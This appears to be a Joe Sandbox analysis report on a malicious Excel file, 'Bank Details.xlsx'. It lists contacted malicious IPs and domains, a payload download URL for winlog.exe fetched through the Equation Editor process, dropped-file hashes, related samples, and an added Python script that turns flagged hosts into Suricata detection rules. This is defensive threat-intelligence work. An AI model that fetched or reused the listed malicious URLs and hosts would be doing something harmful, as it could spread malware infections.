                                                                                                                                                                        high
                                                                                                                                                                        http://www.news.com.au/favicon.icoexplorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown

                                                                                                                                                                        Contacted IPs


                                                                                                                                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.128.125.95 | www.qcmax.com | United States | 26658 | HENGTONG-IDC-LLC (US) | true
18.166.77.19 | dns.95h5cdn.com | United States | 16509 | AMAZON-02 (US) | true
52.59.165.42 | fqe.short.gy | United States | 16509 | AMAZON-02 (US) | false
34.102.136.180 | playfulpainters.com | United States | 15169 | GOOGLE (US) | false
3.230.51.235 | gp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AES (US) | false
103.141.138.117 | stdypmrimelimtewsosq.dns.army | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUP (VN) | true
198.54.117.212 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NET (US) | false
144.76.242.196 | www.christlicheliebe.net | Germany | 24940 | HETZNER-AS (DE) | true
104.21.71.76 | www.hostvngiare.com | United States | 13335 | CLOUDFLARENET (US) | true
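The contacted-IP rows carry the sandbox's per-host verdict, but the flat text export of this section fuses the columns together (domain and country on one line, ASN, ASN name, country code and verdict on the next). The following is an added example, not Joe Sandbox code: it parses those rows (embedded as constructed input copied from this section) into records, pulls out the hosts flagged malicious, and then splits them into addresses that can be blocked outright and domains that should be handled by name, because an address on Cloudflare or AWS is shared with unrelated tenants and an IP block there causes collateral damage. The SHARED_INFRA set and the Suricata rule templates are assumptions made here for illustration; the report itself only states the verdict column.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed input: the "Contacted IPs" rows of this report as they appear in the
# flat text export, three lines per host (IP / domain+country / ASN+name+cc+verdict).
RAW_ROWS = """\
104.128.125.95
www.qcmax.comUnited States
26658HENGTONG-IDC-LLCUStrue
18.166.77.19
dns.95h5cdn.comUnited States
16509AMAZON-02UStrue
52.59.165.42
fqe.short.gyUnited States
16509AMAZON-02USfalse
34.102.136.180
playfulpainters.comUnited States
15169GOOGLEUSfalse
3.230.51.235
gp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.comUnited States
14618AMAZON-AESUSfalse
103.141.138.117
stdypmrimelimtewsosq.dns.armyViet Nam
135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
198.54.117.212
parkingpage.namecheap.comUnited States
22612NAMECHEAP-NETUSfalse
144.76.242.196
www.christlicheliebe.netGermany
24940HETZNER-ASDEtrue
104.21.71.76
www.hostvngiare.comUnited States
13335CLOUDFLARENETUStrue
"""

IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})$")
# Domain names are lower-case; the fused country name starts with a capital letter.
DOMAIN_COUNTRY_RE = re.compile(r"^([a-z0-9.\-]+)([A-Z].*)$")
# ASN digits, ASN name (lazy), two-letter registry country code, verdict.
ASN_RE = re.compile(r"^(\d+)(.*?)([A-Z]{2})(true|false)$")

# Assumption for illustration: ASNs whose addresses are shared by many tenants.
SHARED_INFRA = {"CLOUDFLARENET", "AMAZON-02", "AMAZON-AES", "GOOGLE"}


@dataclass(frozen=True)
class ContactedHost:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    asn_cc: str
    malicious: bool


def parse_contacted_ips(text: str) -> List[ContactedHost]:
    """Turn the three-line-per-host export into structured records."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 3:
        raise ValueError("expected three lines per host")
    hosts = []
    for ip_line, dom_line, asn_line in zip(lines[0::3], lines[1::3], lines[2::3]):
        ip_m, dom_m, asn_m = IP_RE.match(ip_line), DOMAIN_COUNTRY_RE.match(dom_line), ASN_RE.match(asn_line)
        if not (ip_m and dom_m and asn_m):
            raise ValueError(f"unparseable row: {ip_line!r} / {dom_line!r} / {asn_line!r}")
        hosts.append(ContactedHost(
            ip=ip_m.group(1), domain=dom_m.group(1), country=dom_m.group(2),
            asn=int(asn_m.group(1)), asn_name=asn_m.group(2), asn_cc=asn_m.group(3),
            malicious=asn_m.group(4) == "true",
        ))
    return hosts


def malicious_iocs(hosts: List[ContactedHost]) -> List[Tuple[str, str]]:
    """(ip, domain) pairs the sandbox flagged malicious, in report order."""
    return [(h.ip, h.domain) for h in hosts if h.malicious]


def blocklists(hosts: List[ContactedHost]) -> Tuple[List[str], List[str]]:
    """IPs safe to block outright vs. domains to block by name (shared infrastructure)."""
    ips = [h.ip for h in hosts if h.malicious and h.asn_name not in SHARED_INFRA]
    domains = [h.domain for h in hosts if h.malicious and h.asn_name in SHARED_INFRA]
    return ips, domains


def suricata_rules(hosts: List[ContactedHost], sid_base: int = 9000000) -> List[str]:
    """One alert per malicious host: an IP rule, or a dns.query rule on shared infrastructure."""
    ips, domains = blocklists(hosts)
    rules = []
    for i, ip in enumerate(ips):
        rules.append(f'alert ip $HOME_NET any -> {ip} any (msg:"Joe Sandbox 385368 contacted host {ip}"; '
                     f'sid:{sid_base + i}; rev:1;)')
    for j, dom in enumerate(domains, start=len(ips)):
        rules.append(f'alert dns $HOME_NET any -> any any (msg:"Joe Sandbox 385368 DNS query {dom}"; '
                     f'dns.query; content:"{dom}"; nocase; sid:{sid_base + j}; rev:1;)')
    return rules


if __name__ == "__main__":
    parsed = parse_contacted_ips(RAW_ROWS)
    for rule in suricata_rules(parsed):
        print(rule)
```

Of the five hosts marked malicious, 18.166.77.19 (AMAZON-02) and 104.21.71.76 (CLOUDFLARENET) end up as name-based rules; the other three are single-tenant enough to block by address.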

                                                                                                                                                                        General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385368
Start date: 12.04.2021
Start time: 11:36:43
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 42s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Bank Details.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • HDC enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSX@9/28@12/9
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HDC Information:
                                                                                                                                                                        • Successful, ratio: 23.7% (good quality ratio 22.4%)
                                                                                                                                                                        • Quality average: 70.5%
                                                                                                                                                                        • Quality standard deviation: 29.7%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 92%
                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                        • Found application associated with file extension: .xlsx
                                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                                        • Scroll down
                                                                                                                                                                        • Close Viewer
                                                                                                                                                                        Warnings:
                                                                                                                                                                        Show All
                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time     | Type            | Description
11:38:09 | API Interceptor | 59x Sleep call for process: EQNEDT32.EXE modified
11:38:22 | API Interceptor | 34x Sleep call for process: vbc.exe modified
11:38:42 | API Interceptor | 217x Sleep call for process: help.exe modified
11:39:10 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                      • 198.54.117.218
                                                                                                                                                                                      gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.211
                                                                                                                                                                                      eQLPRPErea.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.215
                                                                                                                                                                                      PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.218
                                                                                                                                                                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.216
                                                                                                                                                                                      Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.215
                                                                                                                                                                                      TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.212
                                                                                                                                                                                      46578-TR.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.218
                                                                                                                                                                                      ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.216
                                                                                                                                                                                      SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.217
                                                                                                                                                                                      1517679127365.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.216
                                                                                                                                                                                      BL-2010403L.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 198.54.117.218
                                                                                                                                                                                      www.hostvngiare.comQuotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.71.76
                                                                                                                                                                                      Proforma Invoice 2.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.22.22
                                                                                                                                                                                      ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.202.10
                                                                                                                                                                                      9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.22.22
                                                                                                                                                                                      fqe.short.gypresupuesto.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                                      remittance info.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                                      Required Order Quantity.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                                      Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      www.christlicheliebe.netY79FTQtEqG.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 144.76.242.196
                                                                                                                                                                                      DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                                                                                                                                                      • 144.76.242.196
                                                                                                                                                                                      RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXEGet hashmaliciousBrowse
                                                                                                                                                                                      • 144.76.242.196

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                      sgJRcWvnkP.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.58.78.16
                                                                                                                                                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                                      SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.235.115.155
                                                                                                                                                                                      remittance info.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      Required Order Quantity.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 108.128.238.226
                                                                                                                                                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                                      Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      winlog.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.14.206.30
                                                                                                                                                                                      J6wDHe2QdA.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.22.15.135
                                                                                                                                                                                      hsOBwEXSsq.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.142.167.54

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
7dcce5b76c8b17472d024758970a406b | presupuesto.xlsx | malicious | 52.59.165.42
 | Confirm Order for AKTEK Company_E4117.ppt | malicious | 52.59.165.42
 | PROFORMA INVOICE.xlsx | malicious | 52.59.165.42
 | RFQ P39948220 Inquiry.ppt | malicious | 52.59.165.42
 | Proforma Invoice.xlsx | malicious | 52.59.165.42
 | remittance info.xlsx | malicious | 52.59.165.42
 | Required Order Quantity.xlsx | malicious | 52.59.165.42
 | Proforma Invoice.xlsx | malicious | 52.59.165.42
 | Payment advice IN18663Q0031139I.xlsx | malicious | 52.59.165.42
 | NEW ORDER.xlsx | malicious | 52.59.165.42
 | Purchase Order SC_695853.xlsx | malicious | 52.59.165.42
 | Alexandra38.docx | malicious | 52.59.165.42
 | fileshare.doc | malicious | 52.59.165.42
 | documents-351331057.xlsm | malicious | 52.59.165.42
 | documents-1819557117.xlsm | malicious | 52.59.165.42
 | IMAGE20210406_490133692.exe.exe | malicious | 52.59.165.42
 | PRESUPUESTO.xlsx | malicious | 52.59.165.42
 | Documents_460000622_1464906353.xls | malicious | 52.59.165.42
 | 8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls | malicious | 52.59.165.42
 | 8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls | malicious | 52.59.165.42

Dropped Files

Match | Associated Sample Name / URL | Detection | Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | Purchase Order.xlsx | malicious |
 | Quotation Zhejiang.xlsx | malicious |
C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll | Purchase Order.xlsx | malicious |
 | eQLPRPErea.exe | malicious |
 | Quotation Zhejiang.xlsx | malicious |
C:\Users\Public\vbc.exe | Purchase Order.xlsx | malicious |
 | Quotation Zhejiang.xlsx | malicious |

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: Microsoft Cabinet archive data, 58596 bytes, 1 file
Category: dropped
Size (bytes): 58596
Entropy (8bit): 7.995478615012125
Encrypted: true
SSDEEP: 1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5: 61A03D15CF62612F50B74867090DBE79
SHA1: 15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256: F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512: 5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: data
Category: dropped
Size (bytes): 893
Entropy (8bit): 7.366016576663508
Encrypted: false
SSDEEP: 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5: D4AE187B4574036C2D76B6DF8A8C1A30
SHA1: B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256: A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512: 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: data
Category: dropped
Size (bytes): 326
Entropy (8bit): 3.094144230589345
Encrypted: false
SSDEEP: 6:kK5wTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:RwTJ6HkPlE99SNxAhUe0ht
MD5: FC480F1A325280D2E3D46BB362B1A948
SHA1: A98BF3BA9070287C607B4A11CA708BA297303354
SHA-256: D9F18668A17D3CA5D98387FDE3997965DE341632166542723796F2A720402191
SHA-512: 3E9DE2E9A87E569B8A14A9CC90A9D550F66260385384A998E87A8C1E8A8847B138EA40409D7932BC8D57B3FA1EAF99888CF7A7C866E4AFF465AD2E9B49988BBC
Malicious: false
Reputation: low
                                                                                                                                                                                                    Preview: p...... ........0..../..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:data
Category:dropped
Size (bytes):252
Entropy (8bit):2.9710739663159305
Encrypted:false
SSDEEP:3:kkFklBFHlXfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPM:kKIyQE1liBAIdQZV7ulPPN
MD5:5E60109AD7B42E918233F1AA93E95A2C
SHA1:1003616C4D6A42C72D5964A5988CCE1448B2ECBC
SHA-256:63D02CE83706C273B0EB99FB17714CCFCBE60EBDFEBC23DB4F6D1A2C9AB4E896
SHA-512:325D4856013EFB76D2E31E515CC117DE62C9A4A159D9B9FD4A0B95DBD9E6A24E29049C6B6D0B091D33BEA7A59D382F1DEBAEEE7DDB1A8E7C9F91CABD77867EE8
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:downloaded
Size (bytes):206065
Entropy (8bit):7.915089020780882
Encrypted:false
SSDEEP:3072:NeYBCwqDxkJ0KBUc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlP4:NDIKUc2SXli2LbG87uroXR585UcNKbbQ
MD5:2C64897AA30694CC768F5EA375157932
SHA1:C897F37780A5237D5C330BCF2668745201B38FF5
SHA-256:18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
SHA-512:6C1CFC20E4AAF0EE78B60A80C5FF559CB71AC31B62F2E9068638046CD3FEC5FE078F37DE85C50C65090B82D784931E07BDF692A597B14133EAE36AD143B3FEA2
Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 16%
• Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:
• Filename: Purchase Order.xlsx, Detection: malicious
• Filename: Quotation Zhejiang.xlsx, Detection: malicious
Reputation:low
IE Cache URL:http://stdypmrimelimtewsosq.dns.army/documepnt/winlog.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\12DBE4AC.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 577 x 201, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):9920
Entropy (8bit):7.680823551882418
Encrypted:false
SSDEEP:192:Kcqdy0jT4tDZ3hwGFnIgvEGHEZsuMerPnuM3/g+BYKYp0:pq7jstthwyIJGxuprWso+BYKYp0
MD5:5AF9F8C3DCDB3C155D4283AA797BA7C3
SHA1:226BE2FD7230B34B060FC1C31F5C1A131D0BD01E
SHA-256:29C1F433CDDCB4DE1179CC18182E5052BDE598F560C36FFEAB7975E9F193297C
SHA-512:FF06FCAEB0F521A45B18356DE4230FFBAD7687A183229841017888D6FB97A971BBAF4C98AD7CD46B78D0E3169DF4630DEE2DC155BAB75B903D9C024B45D71A1A
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17154832.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 396x275, frames 3
Category:dropped
Size (bytes):24075
Entropy (8bit):6.730214296651396
Encrypted:false
SSDEEP:384:oKr6BE4bXWRwgWHxVQ9T31pQO9v8IgLvt:oKcElRwfQ9T3cWiB
MD5:09AFF1FCE05F6A872A9F9A75B7C645F5
SHA1:5E8004FDCA739142B1AB20AD6BF773DE8C7B32FD
SHA-256:00B28A518ACB867ABB2F0447DCEB07BD6E47005A1C608ACCF49A4EA3D96112F8
SHA-512:355D944292FDCEC869EE28098B6CDF155EE7E697B3651F40538C34B68086DB370FF1D2B6C7306D71E4203734C73796EC6C9EE0C1F539E4F8F653575EE0FD66D9
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1FC8BBD1.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):79394
Entropy (8bit):7.864111100215953
Encrypted:false
SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:16925690E9B366EA60B610F517789AF1
SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C080710.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 577 x 201, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):9920
Entropy (8bit):7.680823551882418
Encrypted:false
SSDEEP:192:Kcqdy0jT4tDZ3hwGFnIgvEGHEZsuMerPnuM3/g+BYKYp0:pq7jstthwyIJGxuprWso+BYKYp0
MD5:5AF9F8C3DCDB3C155D4283AA797BA7C3
SHA1:226BE2FD7230B34B060FC1C31F5C1A131D0BD01E
SHA-256:29C1F433CDDCB4DE1179CC18182E5052BDE598F560C36FFEAB7975E9F193297C
SHA-512:FF06FCAEB0F521A45B18356DE4230FFBAD7687A183229841017888D6FB97A971BBAF4C98AD7CD46B78D0E3169DF4630DEE2DC155BAB75B903D9C024B45D71A1A
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F0F20D4.emf
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):1720
Entropy (8bit):3.1255010354358324
Encrypted:false
SSDEEP:24:YnnU9lGm0SR7VEyUHUDr7BmygdJIyy1q5shAG1zfHhRmZ/RQIRSvoRQ1R+WX:QWGUhEyUH07BdgdJIaYzfY0R
MD5:0CF4DD6CE503FB21C4330589ACA40F90
SHA1:CDB592106701AF938BC66E63118EB6A732A16CFE
SHA-256:4F7393DB73D828D65388F6917FADDA48B8174EDA2EA02DF017CE3FE59A779205
SHA-512:E5F38688D5E702121F2397FEF8FC6BCBDB92003B46B628E35AF3F3E3485836E0619F04224831BFBE8112C4CDCEB259C7BEE526A7E7EB652DD2D5BEF4E6417FF8
Malicious:false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C8CCA5F.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 3199944
Entropy (8bit): 1.0723286533222698
Encrypted: false
SSDEEP: 6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
MD5: 6CFA3170A68147326768DE26F5E88F3C
SHA1: 5ABCF9E540CFE7E9F1BB50F43FB139722402D141
SHA-256: 5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
SHA-512: 5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
Malicious: false
Preview: ....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F8D22C5.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 1824
Entropy (8bit): 3.1658052279472004
Encrypted: false
SSDEEP: 24:Y809I0tTPQu+BTx3oxtOD/0JIytKqBshAOuQfUhRmP/RQARSGRR86R+ku/Ro7:+gTx3oxtHI+IsKxf
MD5: 38A6926E2461FF5A90D2EB96CEC93E27
SHA1: 70D46A6E576D73A57FD03953A2F330639F185DFA
SHA-256: 27A7C418EC54589DA907E838EA4D23A9BE837E9C002717DA344CA978B0F65F3D
SHA-512: 939FF2FF6C9A22DFC2FC21F3804EA473DD61170A2A65450BF9A6AC23102383F84357D3DD5D14B63A8E132067535CBE5B6B0E9824EC87CA6628CE21D5203CC869
Malicious: false
Preview: ....l...............................i;.. EMF.... ...!...................V...........................fZ..U"..F...........GDIC........jC.]..............................................................................-.........!..................................................................................@..Calibri.a..WpM.......Iww@.zw..f.....-.................2.................LL......2...............$.aL......2.$.........$...6.bL......2.6.........6...H.eL......2.H.........H...Z.lL......2.Z.........Z...l.2L......'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?....................................................................................................R...p................................@..C.a.l.i.b.r.i.................................................................zw........................X..............T....e]w......Yw(..X

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AED92384.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 51166
Entropy (8bit): 7.767050944061069
Encrypted: false
SSDEEP: 1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5: 8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1: 85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256: E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512: F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious: false
